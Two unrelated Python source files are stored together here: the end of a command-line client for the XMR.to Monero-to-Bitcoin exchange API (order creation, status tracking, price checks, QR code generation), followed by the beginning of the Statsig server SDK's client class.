xmrto_error = data
status_ = cls.api_classes[api]
if not status_ or data is None:
return None, xmrto_error
status = status_()
status.state = data.get(status.attributes.state, None)
status.in_out_rate = data.get(status.attributes.in_out_rate, None)
status.out_amount = data.get(status.attributes.out_amount, None)
status.out_amount_partial = data.get(
status.attributes.out_amount_partial, None
)
status.out_address = data.get(status.attributes.out_address, None)
status.in_confirmations_remaining = data.get(
status.attributes.in_confirmations_remaining, None
)
status.in_amount_remaining = data.get(
status.attributes.in_amount_remaining, None
)
status.in_amount = data.get(status.attributes.in_amount, None)
status.payment_subaddress = data.get(
status.attributes.payment_subaddress, None
)
status.seconds_till_timeout = data.get(
status.attributes.seconds_till_timeout, None
)
status.created_at = data.get(status.attributes.created_at, None)
if api == API_VERSIONS.v3:
status.uses_lightning = data.get(
status.attributes.uses_lightning, None
)
status.payments = data.get(status.attributes.payments, None)
return (
status,
xmrto_error,
)
class CheckPrice:
api_classes = {API_VERSIONS.v3: PriceV3}
@classmethod
def get(cls, data, api):
xmrto_error = None
if data and "error" in data:
xmrto_error = data
price_ = cls.api_classes[api]
if not price_ or data is None:
return None, xmrto_error
price = price_()
price.out_amount = data.get(price.attributes.out_amount, None)
price.in_amount = data.get(price.attributes.in_amount, None)
price.in_out_rate = data.get(price.attributes.in_out_rate, None)
price.in_num_confirmations_remaining = data.get(
price.attributes.in_num_confirmations_remaining, None
)
return (
price,
xmrto_error,
)
class CheckRoutes:
api_classes = {API_VERSIONS.v3: Routes}
@classmethod
def get(cls, data, api):
xmrto_error = None
if data and "error" in data:
xmrto_error = data
routes_ = cls.api_classes[api]
if not routes_ or data is None:
return None, xmrto_error
routes = routes_()
routes.num_routes = data.get(routes.attributes.num_routes, None)
routes.success_probability = data.get(
routes.attributes.success_probability, None
)
return (
routes,
xmrto_error,
)
class CheckParameters:
api_classes = {
API_VERSIONS.v3: ParametersV3,
}
@classmethod
def get(cls, data, api):
xmrto_error = None
if data and "error" in data:
xmrto_error = data
parameters_ = cls.api_classes[api]
if not parameters_ or data is None:
return None, xmrto_error
parameters = parameters_()
parameters.price = data.get(parameters.attributes.price, None)
parameters.upper_limit = data.get(
parameters.attributes.upper_limit, None
)
parameters.lower_limit = data.get(
parameters.attributes.lower_limit, None
)
parameters.zero_conf_enabled = data.get(
parameters.attributes.zero_conf_enabled, None
)
parameters.zero_conf_max_amount = data.get(
parameters.attributes.zero_conf_max_amount, None
)
if api == API_VERSIONS.v3:
parameters.ln_upper_limit = data.get(
parameters.attributes.ln_upper_limit, None
)
parameters.ln_lower_limit = data.get(
parameters.attributes.ln_lower_limit, None
)
return (
parameters,
xmrto_error,
)
class CheckQrCode:
@classmethod
def get(cls, data, api):
return data
class XmrtoApi:
CREATE_ORDER_ENDPOINT = "/api/{api_version}/xmr2btc/order_create/"
CREATE_LN_ORDER_ENDPOINT = "/api/{api_version}/xmr2btc/order_create_ln/"
ORDER_STATUS_ENDPOINT = "/api/{api_version}/xmr2btc/order_status_query/"
CHECK_PRICE_ENDPOINT = "/api/{api_version}/xmr2btc/order_check_price/"
CHECK_LN_ROUTES_ENDPOINT = (
"/api/{api_version}/xmr2btc/order_ln_check_route/"
)
CHECK_PARAMETERS_ENDPOINT = (
"/api/{api_version}/xmr2btc/order_parameter_query/"
)
PARTIAL_PAYMENT_ENDPOINT = (
"/api/{api_version}/xmr2btc/order_partial_payment/"
)
QRCODE_ENDPOINT = "/api/{api_version}/xmr2btc/gen_qrcode"
def __init__(
self,
url=XMRTO_URL_DEFAULT,
api=API_VERSION_DEFAULT,
connection=None,
):
self.url = url[:-1] if url.endswith("/") else url
self.api = api
self.__xmr_conn = XmrtoConnection(url=self.url, connection=connection)
def get_connection(self):
return self.__xmr_conn
def __add_amount_and_currency(self, out_amount=None, currency=None):
additional_api_keys = {}
amount_key = "btc_amount"
if self.api == API_VERSIONS.v3:
amount_key = "amount"
additional_api_keys["amount_currency"] = currency
additional_api_keys[f"{amount_key}"] = str(out_amount)
return additional_api_keys
def create_order(self, out_address=None, out_amount=None, currency="BTC"):
if out_address is None:
error = {
"error": "Argument missing.",
"error_msg": "Expected argument '--destination', see 'python xmrto-wrapper.py -h'.",
}
return None, error
if out_amount is None:
error = {
"error": "Argument missing.",
"error_msg": "Expected argument '--btc-amount' or '--xmr-amount', see 'python xmrto-wrapper.py -h'.",
}
return None, error
create_order_url = self.url + self.CREATE_ORDER_ENDPOINT.format(
api_version=self.api
)
postdata = {"btc_dest_address": out_address}
postdata.update(
self.__add_amount_and_currency(
out_amount=out_amount, currency=currency
)
)
response = self.__xmr_conn.post(
url=create_order_url, postdata=postdata
)
return CreateOrder.get(data=response, api=self.api)
def create_ln_order(self, ln_invoice=None):
if ln_invoice is None:
error = {
"error": "Argument missing.",
"error_msg": "Expected argument '--invoice', see 'python xmrto-wrapper.py -h'.",
}
return None, error
create_order_url = self.url + self.CREATE_LN_ORDER_ENDPOINT.format(
api_version=self.api
)
postdata = {"ln_invoice": ln_invoice}
response = self.__xmr_conn.post(
url=create_order_url, postdata=postdata
)
return CreateOrder.get(data=response, api=self.api)
def order_status(self, uuid=None):
if uuid is None:
error = {
"error": "Argument missing.",
"error_msg": "Expected argument '--secret-key', see 'python xmrto-wrapper.py -h'.",
}
return None, error
order_status_url = self.url + self.ORDER_STATUS_ENDPOINT.format(
api_version=self.api
)
postdata = {"uuid": uuid}
response = self.__xmr_conn.post(
url=order_status_url, postdata=postdata
)
return OrderStatus.get(data=response, api=self.api)
def confirm_partial_payment(self, uuid=None):
if uuid is None:
error = {
"error": "Argument missing.",
"error_msg": "Expected argument '--secret-key', see 'python xmrto-wrapper.py -h'.",
}
return False, error
partial_payment_url = self.url + self.PARTIAL_PAYMENT_ENDPOINT.format(
api_version=self.api
)
postdata = {"uuid": uuid}
response = self.__xmr_conn.post(
url=partial_payment_url,
postdata=postdata,
expect_json=False,
expect_response=False,
)
xmrto_error = None
confirmed = True
if response and "error" in response:
xmrto_error = response
confirmed = False
if response is None:
return False, xmrto_error
return confirmed, xmrto_error
def order_check_price(
self, btc_amount=None, xmr_amount=None, currency="BTC"
):
if btc_amount is None and xmr_amount is None:
error = {
"error": "Argument missing.",
"error_msg": "Expected argument --'btc-amount' or '--xmr-amount', see 'python xmrto-wrapper.py -h'.",
}
return None, error
order_check_price_url = self.url + self.CHECK_PRICE_ENDPOINT.format(
api_version=self.api
)
if btc_amount:
currency = "BTC"
out_amount = btc_amount
elif xmr_amount:
currency = "XMR"
out_amount = xmr_amount
postdata = {}
postdata.update(
self.__add_amount_and_currency(
out_amount=out_amount, currency=currency
)
)
response = self.__xmr_conn.post(
url=order_check_price_url, postdata=postdata
)
return CheckPrice.get(data=response, api=self.api)
def order_check_ln_routes(self, ln_invoice=None):
logger.debug(ln_invoice)
if ln_invoice is None:
error = {
"error": "Argument missing.",
"error_msg": "Expected argument '--invoice', see 'python xmrto-wrapper.py -h'.",
}
return None, error
order_check_ln_routes_url = (
self.url
+ self.CHECK_LN_ROUTES_ENDPOINT.format(api_version=self.api)
)
query_param = f"?ln_invoice={ln_invoice}"
response = self.__xmr_conn.get(
url=order_check_ln_routes_url + query_param
)
return CheckRoutes.get(data=response, api=self.api)
def order_check_parameters(self):
order_check_parameters_url = (
self.url
+ self.CHECK_PARAMETERS_ENDPOINT.format(api_version=self.api)
)
response = self.__xmr_conn.get(url=order_check_parameters_url)
return CheckParameters.get(data=response, api=self.api)
def generate_qrcode(self, data=None):
if data is None:
return None
generate_qrcode_url = (
self.url
+ self.QRCODE_ENDPOINT.format(api_version=self.api)
+ f"/?data={data}"
)
response = self.__xmr_conn.get(
url=generate_qrcode_url, expect_json=False
)
return CheckQrCode.get(data=response, api=self.api)
class OrderStateType(type):
def __new__(cls, *args):
x = super().__new__(cls, *args)
x.TO_BE_CREATED = "TO_BE_CREATED"
x.UNPAID = "UNPAID"
x.UNDERPAID = "UNDERPAID"
x.PAID_UNCONFIRMED = "PAID_UNCONFIRMED"
x.BTC_SENT = "BTC_SENT"
x.TIMED_OUT = "TIMED_OUT"
x.PURGED = "PURGED"
x.FLAGGED_DESTINATION_ADDRESS = "FLAGGED_DESTINATION_ADDRESS"
x.PAYMENT_FAILED = "PAYMENT_FAILED"
x.REJECTED = "REJECTED"
return x
class XmrtoOrderStatus:
def __init__(
self,
url=XMRTO_URL_DEFAULT,
api=API_VERSION_DEFAULT,
uuid=None,
connection=None,
):
self.url = url[:-1] if url.endswith("/") else url
self.api = api
self.xmrto_api = XmrtoApi(
url=self.url, api=self.api, connection=connection
)
self.uuid = uuid
self.order_status = None
self.error = None
self.in_amount = None
self.in_amount_remaining = None
self.in_out_rate = None
self.out_amount = None
self.out_amount_partial = None
self.out_address = None
self.payment_subaddress = None
self.seconds_till_timeout = None
self.created_at = None
self.in_confirmations_remaining = None
self.payments = None
self.uses_lightning = None
self.state = XmrtoOrder.TO_BE_CREATED
def get_order_status(self, uuid=None):
if uuid is None:
uuid = self.uuid
else:
self.uuid = uuid
if not all([self.url, self.api, self.uuid]):
logger.error("Please check the arguments.")
self.order_status, self.error = self.xmrto_api.order_status(uuid=uuid)
if self.order_status:
self.state = self.order_status.state
self.in_amount = self.order_status.in_amount
self.in_amount_remaining = self.order_status.in_amount_remaining
self.in_out_rate = self.order_status.in_out_rate
self.out_amount = self.order_status.out_amount
self.out_amount_partial = self.order_status.out_amount_partial
self.out_address = self.order_status.out_address
self.payment_subaddress = self.order_status.payment_subaddress
self.seconds_till_timeout = self.order_status.seconds_till_timeout
self.created_at = self.order_status.created_at
self.in_confirmations_remaining = (
self.order_status.in_confirmations_remaining
)
if self.api == API_VERSIONS.v3:
self.payments = self.order_status.payments
self.uses_lightning = self.order_status.uses_lightning
return True
def confirm_partial_payment(self, uuid=None):
self.get_order_status(uuid=uuid)
if self.error:
return False
(
partial_payment_confirmed,
self.error,
) = self.xmrto_api.confirm_partial_payment(uuid=self.uuid)
return partial_payment_confirmed
def _to_json(self):
data = {}
if self.uuid:
data.update({OrderAttributesV3.uuid: self.uuid})
if self.state:
data.update({OrderAttributesV3.state: self.state})
if self.out_address:
data.update({StatusAttributesV3.out_address: self.out_address})
if self.out_amount:
data.update({StatusAttributesV3.out_amount: self.out_amount})
if self.payment_subaddress:
data[
StatusAttributesV3.payment_subaddress
] = self.payment_subaddress
if self.in_amount:
data[StatusAttributesV3.in_amount] = self.in_amount
if self.in_amount_remaining:
data[
StatusAttributesV3.in_amount_remaining
] = self.in_amount_remaining
if self.in_out_rate:
data[StatusAttributesV3.in_out_rate] = self.in_out_rate
if self.out_amount:
data[StatusAttributesV3.out_amount] = self.out_amount
if self.out_amount_partial:
data[
StatusAttributesV3.out_amount_partial
] = self.out_amount_partial
if self.seconds_till_timeout:
data[
StatusAttributesV3.seconds_till_timeout
] = self.seconds_till_timeout
if self.created_at:
data[StatusAttributesV3.created_at] = self.created_at
if (
self.in_confirmations_remaining
and self.in_confirmations_remaining > 0
):
data[
StatusAttributesV3.in_confirmations_remaining
] = self.in_confirmations_remaining
if self.payments:
data.update({StatusAttributesV3.payments: self.payments})
if self.uses_lightning is not None:
data.update(
{StatusAttributesV3.uses_lightning: self.uses_lightning}
)
if self.error:
data["error"] = self.error
return data
def __str__(self):
return json.dumps(self._to_json())
class XmrtoOrder(metaclass=OrderStateType):
def __init__(
self,
url=XMRTO_URL_DEFAULT,
api=API_VERSION_DEFAULT,
out_address=None,
btc_amount=None,
xmr_amount=None,
connection=None,
):
self.url = url[:-1] if url.endswith("/") else url
self.api = api
self.xmrto_api = XmrtoApi(
url=self.url, api=self.api, connection=connection
)
self.order = None
self.order_status = None
self.error = None
self.out_address = out_address
self.btc_amount = btc_amount
self.btc_amount_partial = None
self.xmr_amount = xmr_amount
self.out_amount = None
self.currency = None
self.uuid = None
self.in_amount = None
self.in_amount_remaining = None
self.in_out_rate = None
self.payment_subaddress = None
self.uses_lightning = None
self.state = XmrtoOrder.TO_BE_CREATED
def create_order(
self,
out_address=None,
btc_amount=None,
xmr_amount=None,
currency="BTC",
):
if out_address is None:
out_address = self.out_address
else:
self.out_address = out_address
if btc_amount is None:
btc_amount = self.btc_amount
else:
self.btc_amount = btc_amount
if xmr_amount is None:
xmr_amount = self.xmr_amount
else:
self.xmr_amount = xmr_amount
if not any([self.btc_amount, self.xmr_amount]):
logger.debug(
f"out amount: '{self.btc_amount}', in amount '{self.xmr_amount}'."
)
logger.error("Please check the arguments.")
if not all([self.url, self.api, self.out_address]):
logger.debug(f"destination address: '{self.out_address}'.")
logger.error("Please check the arguments.")
out_amount = self.btc_amount
if btc_amount:
currency = "BTC"
out_amount = self.btc_amount
elif xmr_amount:
currency = "XMR"
out_amount = self.xmr_amount
self.currency = currency
        logger.debug(
            f"transfer '{out_amount}' [{currency}] to '{self.out_address}'."
        )
self.order, self.error = self.xmrto_api.create_order(
out_address=self.out_address,
out_amount=out_amount,
currency=currency,
)
if self.order:
self.uuid = self.order.uuid
self.state = self.order.state
self.out_amount = self.order.out_amount
self.out_address = self.order.out_address
if self.api == API_VERSIONS.v3:
self.uses_lightning = self.order.uses_lightning
def get_order_status(self, uuid=None):
if uuid is None:
uuid = self.uuid
if self.error:
return 1
self.order_status = XmrtoOrderStatus(
url=self.url,
api=self.api,
connection=self.xmrto_api.get_connection().get_connection(),
)
self.order_status.get_order_status(uuid=uuid)
if self.order_status:
self.state = self.order_status.state
self.in_amount = self.order_status.in_amount
self.in_amount_remaining = self.order_status.in_amount_remaining
self.in_out_rate = self.order_status.in_out_rate
self.out_amount = self.order_status.out_amount
self.btc_amount_partial = self.order_status.out_amount_partial
self.payment_subaddress = self.order_status.payment_subaddress
if self.api == API_VERSIONS.v3:
self.payments = self.order_status.payments
self.uses_lightning = self.order.uses_lightning
self.error = self.order_status.error
def _to_json(self):
data = {}
if self.uuid:
data.update({OrderAttributesV3.uuid: self.uuid})
if self.state:
data.update({OrderAttributesV3.state: self.state})
if self.out_address:
data.update({OrderAttributesV3.out_address: self.out_address})
if self.out_amount:
data.update({OrderAttributesV3.out_amount: self.out_amount})
if self.uses_lightning is not None:
data.update(
{OrderAttributesV3.uses_lightning: self.uses_lightning}
)
if self.order_status:
data.update(self.order_status._to_json())
if self.error:
data.update(self.error)
return data
def __str__(self):
return json.dumps(self._to_json())
class XmrtoLnOrder(XmrtoOrder):
def __init__(
self,
url=XMRTO_URL_DEFAULT,
api=API_VERSION_DEFAULT,
ln_invoice=None,
connection=None,
):
super().__init__(url=url, api=api, connection=connection)
self.ln_invoice = ln_invoice
def create_order(self, ln_invoice=None):
if ln_invoice is None:
ln_invoice = self.ln_invoice
else:
self.ln_invoice = ln_invoice
if not all([self.url, self.api, self.ln_invoice]):
logger.debug(f"{self.ln_invoice}")
logger.error("Please check the arguments.")
logger.debug(f"{self.ln_invoice}")
self.order, self.error = self.xmrto_api.create_ln_order(
ln_invoice=self.ln_invoice
)
if self.order:
self.uuid = self.order.uuid
self.state = self.order.state
self.out_amount = self.order.out_amount
self.out_address = self.order.out_address
def create_order(
xmrto_url=XMRTO_URL,
api_version=API_VERSION,
out_address=DESTINATION_ADDRESS,
btc_amount=BTC_AMOUNT,
xmr_amount=XMR_AMOUNT,
connection=None,
):
order = XmrtoOrder(
url=xmrto_url,
api=api_version,
out_address=out_address,
btc_amount=btc_amount,
xmr_amount=xmr_amount,
connection=connection,
)
order.create_order()
logger.debug(f"XMR.to order: {order}")
order.get_order_status()
logger.debug(f"Order created: {order}")
return order
def create_ln_order(
xmrto_url=XMRTO_URL,
api_version=API_VERSION,
ln_invoice=LN_INVOICE,
connection=None,
):
order = XmrtoLnOrder(
url=xmrto_url,
api=api_version,
ln_invoice=ln_invoice,
connection=connection,
)
order.create_order()
logger.debug(f"XMR.to order: {order}")
order.get_order_status()
logger.debug(f"Order created: {order}")
return order
def track_order(
xmrto_url=XMRTO_URL,
api_version=API_VERSION,
uuid=SECRET_KEY,
connection=None,
):
order_status = XmrtoOrderStatus(
url=xmrto_url, api=api_version, uuid=uuid, connection=connection
)
order_status.get_order_status()
return order_status
def confirm_partial_payment(
xmrto_url=XMRTO_URL,
api_version=API_VERSION,
uuid=SECRET_KEY,
connection=None,
):
order_status = track_order(
xmrto_url=xmrto_url,
api_version=api_version,
uuid=uuid,
connection=connection,
)
if not order_status.state == XmrtoOrder.UNDERPAID:
        logger.warning(
            "The order is not ready for a partial payment (wrong state)."
        )
return order_status
else:
partial_payment_confirmed = order_status.confirm_partial_payment()
if not partial_payment_confirmed:
logger.error("The partial payment was not confirmed.")
else:
logger.info("The partial payment was confirmed.")
return order_status
def order_check_price(
xmrto_url=XMRTO_URL,
api_version=API_VERSION,
btc_amount=BTC_AMOUNT,
xmr_amount=XMR_AMOUNT,
connection=None,
):
xmrto_api = XmrtoApi(url=xmrto_url, api=api_version, connection=connection)
return xmrto_api.order_check_price(
btc_amount=btc_amount, xmr_amount=xmr_amount
)
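# Illustrative sketch (not part of the original code): querying the price for a
# 0.1 BTC order; the helper returns a (price, error) tuple.
#
#     price, error = order_check_price(btc_amount="0.1")
#     if not error:
#         print(price)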
def order_check_ln_routes(
xmrto_url=XMRTO_URL,
api_version=API_VERSION,
ln_invoice=LN_INVOICE,
connection=None,
):
xmrto_api = XmrtoApi(url=xmrto_url, api=api_version, connection=connection)
return xmrto_api.order_check_ln_routes(ln_invoice=ln_invoice)
def order_check_parameters(
xmrto_url=XMRTO_URL, api_version=API_VERSION, connection=None
):
xmrto_api = XmrtoApi(url=xmrto_url, api=api_version, connection=connection)
return xmrto_api.order_check_parameters()
def generate_qrcode(
xmrto_url=XMRTO_URL, api_version=API_VERSION, data=QR_DATA, connection=None
):
xmrto_api = XmrtoApi(url=xmrto_url, api=api_version, connection=connection)
qrcode = xmrto_api.generate_qrcode(data=data)
    if not qrcode:
        print("No data provided to convert to qrcode.")
        return
with open("qrcode.png", "wb") as qrcode_file:
for chunk in qrcode:
qrcode_file.write(chunk)
print("Stored qrcode in qrcode.png.")
def follow_order(order=None, follow=False):
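    # Poll the order status every 3 seconds and keep printing it until the BTC
    # has been sent, an error occurs, or the order times out; with follow=False
    # the current state (and payment details, if unpaid) is printed once.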
total = 1
if order:
while not order.state == XmrtoOrder.BTC_SENT and not order.error:
print(order)
if order.state in (XmrtoOrder.UNPAID, XmrtoOrder.UNDERPAID):
print("Pay:")
print(
f" transfer {order.order_status.payment_subaddress} {order.order_status.in_amount_remaining}"
)
if not follow:
return
if order.state == XmrtoOrder.TIMED_OUT:
total -= 1
if total == 0:
break
time.sleep(3)
order.get_order_status()
print(order)
def logo_action(text=""):
class customAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
print(text)
setattr(args, self.dest, values)
sys.exit(0)
return customAction
def main():
from ._version import __version__
from ._logo import __complete__, __xmrto__, __monero__
parser = argparse.ArgumentParser(
description=__xmrto__ + "\nInteract with XMR.to.",
# formatter_class=argparse.ArgumentDefaultsHelpFormatter,
formatter_class=argparse.RawTextHelpFormatter,
epilog=__monero__,
allow_abbrev=False,
)
parser.add_argument(
"--version",
action="version",
version="%(prog)s {version}".format(version=__version__),
)
parser.add_argument(
"--logo",
action=logo_action(text=__complete__),
nargs=0,
)
config = argparse.ArgumentParser(add_help=False)
config.add_argument(
"--url",
nargs="?",
default=XMRTO_URL_DEFAULT,
help="XMR.to url to use.",
)
config.add_argument(
"--api", default=API_VERSION_DEFAULT, help="XMR.to API version to use."
)
config.add_argument(
"--debug", action="store_true", help="Show debug info."
)
config.add_argument("--cert", nargs="?", help="Local certificate.")
# subparsers
subparsers = parser.add_subparsers(help="Sub commands.", dest="subcommand")
subparsers.required = True
# Create order
create = subparsers.add_parser(
"create-order",
parents=[config],
help="Create an order.",
description="Create an order.",
formatter_class=argparse.RawTextHelpFormatter,
epilog=__complete__,
allow_abbrev=False,
)
create.add_argument(
"--destination",
required=True,
help="Destination (BTC) address to send money to.",
)
create_group = create.add_mutually_exclusive_group(required=True)
btc_group = create_group.add_mutually_exclusive_group()
btc_group.add_argument("--btc-amount", help="Amount to send in BTC.")
btc_group.add_argument("--btc", help="Amount to send in BTC.")
xmr_group = create_group.add_mutually_exclusive_group()
xmr_group.add_argument("--xmr-amount", help="Amount to send in XMR.")
xmr_group.add_argument("--xmr", help="Amount to send in XMR.")
create.add_argument(
"--follow", action="store_true", help="Keep tracking order."
)
# Create lightning order
create_ln = subparsers.add_parser(
"create-ln-order",
parents=[config],
help="Create a lightning order.",
description="Create a lightning order.",
formatter_class=argparse.RawTextHelpFormatter,
epilog=__complete__,
allow_abbrev=False,
)
create_ln.add_argument(
"--invoice",
required=True,
help="Lightning invoice to pay.",
)
create_ln.add_argument(
"--follow", action="store_true", help="Keep tracking order."
)
# Track order
track = subparsers.add_parser(
"track-order",
parents=[config],
help="Track an order.",
description="Track an order.",
formatter_class=argparse.RawTextHelpFormatter,
epilog=__complete__,
allow_abbrev=False,
)
track_group = track.add_mutually_exclusive_group(required=True)
track_group.add_argument(
"--secret-key", help="Existing secret key of an existing order."
)
track_group.add_argument(
"--secret", help="Existing secret key of an existing order."
)
track_group.add_argument(
"--key", help="Existing secret key of an existing order."
)
track.add_argument(
"--follow", action="store_true", help="Keep tracking order."
)
# Partial payment
partial = subparsers.add_parser(
"confirm-partial-payment",
parents=[config],
help="Confirm the partial payment of an order.",
description="Confirm the partial payment of an order.",
formatter_class=argparse.RawTextHelpFormatter,
epilog=__complete__,
allow_abbrev=False,
)
partial_group = partial.add_mutually_exclusive_group(required=True)
partial_group.add_argument(
"--secret-key", help="Existing secret key of an existing order."
)
partial_group.add_argument(
"--secret", help="Existing secret key of an existing order."
)
partial_group.add_argument(
"--key", help="Existing secret key of an existing order."
)
partial.add_argument(
"--follow", action="store_true", help="Keep tracking order."
)
# Check price
price = subparsers.add_parser(
"check-price",
parents=[config],
help="Get price for amount in currency.",
description="Get price for amount in currency.",
formatter_class=argparse.RawTextHelpFormatter,
epilog=__complete__,
allow_abbrev=False,
)
price_group = price.add_mutually_exclusive_group(required=True)
btc_group = price_group.add_mutually_exclusive_group()
btc_group.add_argument("--btc-amount", help="Amount to send in BTC.")
btc_group.add_argument("--btc", help="Amount to send in BTC.")
xmr_group = price_group.add_mutually_exclusive_group()
xmr_group.add_argument("--xmr-amount", help="Amount to send in XMR.")
xmr_group.add_argument("--xmr", help="Amount to send in XMR.")
price.add_argument(
"--follow", action="store_true", help="Keep checking price."
)
    # Check lightning routes
routes = subparsers.add_parser(
"check-ln-routes",
parents=[config],
help="Get available lightning routes.",
description="Get available lightning routes.",
formatter_class=argparse.RawTextHelpFormatter,
epilog=__complete__,
allow_abbrev=False,
)
routes.add_argument(
"--invoice",
required=True,
help="Lightning invoice to check routes for.",
)
# Parameters
parameters = subparsers.add_parser(
"parameters",
parents=[config],
help="Get order parameters.",
description="Get order parameters.",
formatter_class=argparse.RawTextHelpFormatter,
epilog=__complete__,
allow_abbrev=False,
)
parameters.add_argument(
"--follow", action="store_true", help="Keep querying parameters."
)
# Create qrcode
qrcode = subparsers.add_parser(
"qrcode",
parents=[config],
description="Create a qrcode, is stored in a file called 'qrcode.png'.",
formatter_class=argparse.RawTextHelpFormatter,
epilog=__complete__,
allow_abbrev=False,
)
    qrcode.add_argument("--data", required=True, help="Data to encode into a QR code.")
args = parser.parse_args()
cmd_create_order = False
cmd_create_ln_order = False
cmd_track_order = False
cmd_partial_payment = False
cmd_check_price = False
cmd_check_ln_routes = False
cmd_get_parameters = False
cmd_create_qrcode = False
follow = False
debug = args.debug
if debug:
logger.setLevel(logging.DEBUG)
logger.debug("Show DEBUG information.")
stream_handler = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter(f"%(lineno)s: {logging.BASIC_FORMAT}")
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
logger.propagate = False
else:
logger.setLevel(logging.INFO)
if args.subcommand == "create-order":
cmd_create_order = True
destination_address = args.destination
btc_amount = args.btc_amount or args.btc
xmr_amount = args.xmr_amount or args.xmr
follow = args.follow
elif args.subcommand == "create-ln-order":
cmd_create_ln_order = True
ln_invoice = args.invoice
follow = args.follow
elif args.subcommand == "track-order":
cmd_track_order = True
secret_key = args.secret_key or args.secret or args.key
follow = args.follow
elif args.subcommand == "confirm-partial-payment":
cmd_partial_payment = True
secret_key = args.secret_key or args.secret or args.key
follow = args.follow
elif args.subcommand == "check-price":
cmd_check_price = True
btc_amount = args.btc_amount or args.btc
xmr_amount = args.xmr_amount or args.xmr
follow = args.follow
elif args.subcommand == "check-ln-routes":
cmd_check_ln_routes = True
ln_invoice = args.invoice
elif args.subcommand == "parameters":
cmd_get_parameters = True
follow = args.follow
elif args.subcommand == "qrcode":
cmd_create_qrcode = True
qr_data = args.data
xmrto_url = args.url
api_version = args.api
if api_version not in API_VERSIONS_:
print(f"API {api_version} is not supported.")
return 1
global CERTIFICATE
if not CERTIFICATE:
CERTIFICATE = args.cert
# Create a connection that can be reused.
conn = XmrtoConnection(url=xmrto_url)
connection = conn.get_connection()
logger.info(
f"Working with: '{conn.get_hostname()}', API version: '{api_version}'."
)
if cmd_create_order:
logger.debug(f"Creating order.")
order = create_order(
xmrto_url=xmrto_url,
api_version=api_version,
out_address=destination_address,
btc_amount=btc_amount,
xmr_amount=xmr_amount,
connection=connection,
)
logger.debug(f"Order: {order.uuid}")
try:
follow_order(order=order, follow=follow)
except KeyboardInterrupt:
print("\nUser interrupted")
if order:
print(order)
elif cmd_create_ln_order:
order = create_ln_order(
xmrto_url=xmrto_url,
api_version=api_version,
ln_invoice=ln_invoice,
connection=connection,
)
try:
follow_order(order=order, follow=follow)
except KeyboardInterrupt:
print("\nUser interrupted")
if order:
print(order)
elif cmd_track_order:
order_status = track_order(
xmrto_url=xmrto_url,
api_version=api_version,
uuid=secret_key,
connection=connection,
)
try:
follow_order(order=order_status, follow=follow)
except KeyboardInterrupt:
print("\nUser interrupted")
if order_status:
print(order_status)
elif cmd_partial_payment:
order_status = confirm_partial_payment(
xmrto_url=xmrto_url,
api_version=api_version,
uuid=secret_key,
connection=connection,
)
try:
follow_order(order=order_status, follow=follow)
except KeyboardInterrupt:
print("\nUser interrupted")
if order_status:
print(order_status)
elif cmd_check_price:
while True:
try:
price, error = order_check_price(
xmrto_url=xmrto_url,
api_version=api_version,
btc_amount=btc_amount,
xmr_amount=xmr_amount,
connection=connection,
)
if error:
print(error)
return 1
print(price)
if not follow:
return
time.sleep(1)
except KeyboardInterrupt:
print("\nUser interrupted")
return
elif cmd_check_ln_routes:
routes, error = order_check_ln_routes(
xmrto_url=xmrto_url,
api_version=api_version,
ln_invoice=ln_invoice,
connection=connection,
)
if error:
print(error)
return 1
print(routes)
elif cmd_get_parameters:
while True:
try:
parameters, error = order_check_parameters(
xmrto_url=xmrto_url,
api_version=api_version,
connection=connection,
)
if error:
print(error)
return 1
print(parameters)
if not follow:
return
time.sleep(1)
except KeyboardInterrupt:
print("\nUser interrupted")
return
elif cmd_create_qrcode:
generate_qrcode(
xmrto_url=xmrto_url,
api_version=api_version,
data=qr_data,
connection=connection,
)
if __name__ == "__main__":
sys.exit(main())
|
the-stack_106_30667 | import asyncio
import threading
from .evaluator import _ConfigEvaluation, _Evaluator
from .statsig_network import _StatsigNetwork
from .statsig_logger import _StatsigLogger
from .dynamic_config import DynamicConfig
from .statsig_options import StatsigOptions
from .version import __version__
RULESETS_SYNC_INTERVAL = 10
IDLISTS_SYNC_INTERVAL = 60
class StatsigServer:
def initialize(self, sdkKey: str, options=None):
if sdkKey is None or not sdkKey.startswith("secret-"):
raise ValueError(
'Invalid key provided. You must use a Server Secret Key from the Statsig console.')
if options is None:
options = StatsigOptions()
self._options = options
self.__shutdown_event = threading.Event()
self.__statsig_metadata = {
"sdkVersion": __version__,
"sdkType": "py-server"
}
self._network = _StatsigNetwork(sdkKey, options)
self._logger = _StatsigLogger(self._network, self.__shutdown_event, self.__statsig_metadata, options.local_mode)
self._evaluator = _Evaluator()
self._last_update_time = 0
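        # Unless running in local mode, fetch the rulesets and ID lists once up
        # front and then keep them in sync with daemon threads that poll on the
        # configured intervals.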
if not options.local_mode:
self._download_config_specs()
self.__background_download_configs = threading.Thread(
target=self._sync, args=(self._download_config_specs, options.rulesets_sync_interval or RULESETS_SYNC_INTERVAL,))
self.__background_download_configs.daemon = True
self.__background_download_configs.start()
if not options.local_mode:
self._download_id_lists()
self.__background_download_idlists = threading.Thread(
target=self._sync, args=(self._download_id_lists, options.idlists_sync_interval or IDLISTS_SYNC_INTERVAL,))
self.__background_download_idlists.daemon = True
self.__background_download_idlists.start()
self._initialized = True
def check_gate(self, user:object, gate_name:str):
if not self._initialized:
raise RuntimeError(
'Must call initialize before checking gates/configs/experiments or logging events')
if not user or not user.user_id:
raise ValueError(
'A non-empty StatsigUser.user_id is required. See https://docs.statsig.com/messages/serverRequiredUserID')
if not gate_name:
return False
result = self.__check_gate_server_fallback(user, gate_name)
return result.boolean_value
def get_config(self, user:object, config_name:str):
if not self._initialized:
raise RuntimeError(
'Must call initialize before checking gates/configs/experiments or logging events')
if not user or not user.user_id:
raise ValueError(
'A non-empty StatsigUser.user_id is required. See https://docs.statsig.com/messages/serverRequiredUserID')
if not config_name:
return DynamicConfig({})
result = self.__get_config_server_fallback(user, config_name)
return DynamicConfig(result.json_value, config_name, result.rule_id)
def get_experiment(self, user:object, experiment_name:str):
return self.get_config(user, experiment_name)
def log_event(self, event:object):
if not self._initialized:
raise RuntimeError(
'Must call initialize before checking gates/configs/experiments or logging events')
event.user = self.__normalize_user(event.user)
self._logger.log(event)
def shutdown(self):
self.__shutdown_event.set()
self._logger.shutdown()
self.__background_download_configs.join()
self.__background_download_idlists.join()
def override_gate(self, gate:str, value:bool, user_id:str = None):
self._evaluator.override_gate(gate, value, user_id)
